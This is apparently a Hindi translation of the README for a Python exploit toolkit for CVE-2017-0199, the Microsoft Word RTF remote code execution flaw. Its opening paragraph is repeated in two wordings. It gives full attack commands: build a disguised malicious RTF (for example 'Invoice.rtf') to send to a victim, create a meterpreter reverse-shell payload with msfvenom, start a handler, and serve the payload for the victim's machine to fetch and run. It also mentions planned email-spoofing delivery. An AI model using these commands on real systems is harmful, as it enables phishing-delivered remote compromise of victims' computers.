
Exploit toolkit CVE-2017-0199 - v2.0 एक उपयोगी python script है जो Microsoft RTF RCE का दोहन करने का एक त्वरित और प्रभावी तरीका प्रदान करता है। यह एक दुर्भावनापूर्ण RTF फ़ाइल उत्पन्न कर सकता है और बिना किसी जटिल कॉन्फ़िगरेशन के victim को metasploit / meterpreter / कोई भी अन्य payload वितरित कर सकता है।
शोषण टूलकिट CVE-2017-0199 - v2.0 एक उपयोगी पायथन स्क्रिप्ट है जो Microsoft RTF RCE का शोषण करने का एक त्वरित और प्रभावी तरीका प्रदान करती है। यह एक दुर्भावनापूर्ण RTF फ़ाइल उत्पन्न कर सकता है और किसी भी जटिल कॉन्फ़िगरेशन के बिना पीड़ित को मेटास्प्लॉइट / मीटरप्रेटर पेलोड प्रदान कर सकता है।
स्क्रिप्ट में निम्नलिखित क्षमताएँ जोड़ी गईं
- टूलकिट का उपयोग करके दुर्भावनापूर्ण RTF फ़ाइल उत्पन्न करें
- छोटे HTA + वेब सर्वर के रूप में शोषण मोड में टूलकिट चलाएं
संस्करण: पायथन संस्करण 2.7.13
निम्नलिखित सुविधा पर काम चल रहा है
- ईमेल स्पूफिंग का उपयोग करके पीड़ित को उत्पन्न दुर्भावनापूर्ण RTF स्वचालित रूप से भेजें
चरण 1: निम्नलिखित कमांड का उपयोग करके दुर्भावनापूर्ण RTF फ़ाइल उत्पन्न करें और इसे पीड़ित को भेजें
Syntax:
# python cve-2017-0199_toolkit.py -M gen -w <filename.rtf> -u <http://attacker.com/test.hta>
Example:
# python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc
चरण 2 (वैकल्पिक, यदि MSF पेलोड का उपयोग कर रहे हैं): मेटास्प्लॉइट पेलोड उत्पन्न करें और हैंडलर प्रारंभ करें
Example:
Generate Payload:
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
Start Handler:
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
चरण 3: पेलोड वितरित करने के लिए शोषण मोड में टूलकिट प्रारंभ करें
Syntax:
# python cve-2017-0199_toolkit.py -M exp -e <http://attacker.com/shell.exe> -l </tmp/shell.exe>
Example:
# python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
# python cve-2017-0199_toolkit.py -h
This is a handy toolkit to exploit CVE-2017-0199 (Microsoft Word RTF RCE)
Modes:
-M gen Generate Malicious RTF file only
Generate malicious RTF file:
-w <Filename.rtf> Name of malicious RTF file (Share this file with victim).
-u <http://attacker.com/test.hta> The path to an hta file. Normally, this should be a domain or IP where this tool is running.
For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and
will be requested once victim will open malicious RTF file.
-M exp Start exploitation mode
Exploitation:
-p <TCP port:Default 80> Local port number.
-e <http://attacker.com/shell.exe> The path of an executable file / meterpreter shell / payload which needs to be executed on target.
-l </tmp/shell.exe> Local path of an executable file / meterpreter shell / payload (If payload is hosted locally).
यह प्रोग्राम केवल शैक्षिक उद्देश्य के लिए है। बिना अनुमति के इसका उपयोग न करें। सामान्य अस्वीकरण लागू होता है, विशेष रूप से यह तथ्य कि मैं (bhdresh) इन प्रोग्रामों द्वारा प्रदान की गई जानकारी या कार्यक्षमता के प्रत्यक्ष या अप्रत्यक्ष उपयोग से होने वाली किसी भी क्षति के लिए उत्तरदायी नहीं हूं। लेखक या कोई भी इंटरनेट प्रदाता इन प्रोग्रामों या उनके किसी भी व्युत्पन्न की सामग्री या दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है। इस प्रोग्राम का उपयोग करके आप इस तथ्य को स्वीकार करते हैं कि इन प्रोग्रामों के उपयोग से होने वाली कोई भी क्षति (डेटा हानि, सिस्टम क्रैश, सिस्टम से समझौता, आदि) bhdresh की जिम्मेदारी नहीं है।
@nixawk for RTF sample, @bhdresh
जाहिर है, मैं पूर्णकालिक डेवलपर नहीं हूं, इसलिए कुछ रुकावटों की उम्मीद करें
कृपया बग, समस्याएँ [email protected] पर रिपोर्ट करें